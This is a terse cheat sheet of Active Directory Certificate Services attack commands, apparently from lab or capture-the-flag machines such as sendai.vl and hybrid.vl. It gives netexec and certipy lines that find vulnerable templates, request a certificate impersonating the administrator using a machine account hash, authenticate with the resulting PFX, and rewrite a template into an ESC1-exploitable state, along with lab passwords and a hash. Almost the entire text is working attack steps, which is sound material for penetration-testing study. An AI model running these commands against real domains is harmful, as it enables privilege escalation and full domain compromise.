-
nxc ldap sendai.vl -u Elliot.Yates -p 'aditya123@' -M adcs - To check for vulnerable certificates
sudo certipy-ad find -u 'a.briggs' -p 'password' -dc-ip <ip> -stdout -vulnerable
To get in bloodhound format : -old-bloodhound
- Add custom queries in
~./config/bloodhound/customqueries.json
- To request certificate:
certipy req -u 'MAIL01$'@hybrid.vl -hashes 0f916c5246fdbc7ba95dcef4126d57bd -c 'hybrid-DC01-CA' -target 'hybrid.vl' -template 'HybridComputers' -upn '[email protected]' -dc-ip 10.10.208.21 -key-size 4096 -debug
- To auth:
certipy auth -pfx administrator_dc01.pfx -dc-ip 10.10.208.21
- Convert to ESC1 and follow ESC1 procedure:
certipy template -username 'clifford.davey'@sendai.vl -password RFmoB2WplgE_3p -template SendaiComputer -save-old
- Try petitpotam.md
- Check nmap for certificate authority
- If found enumerate post exploitation with certify.exe
- Refer Absolute-HTB for more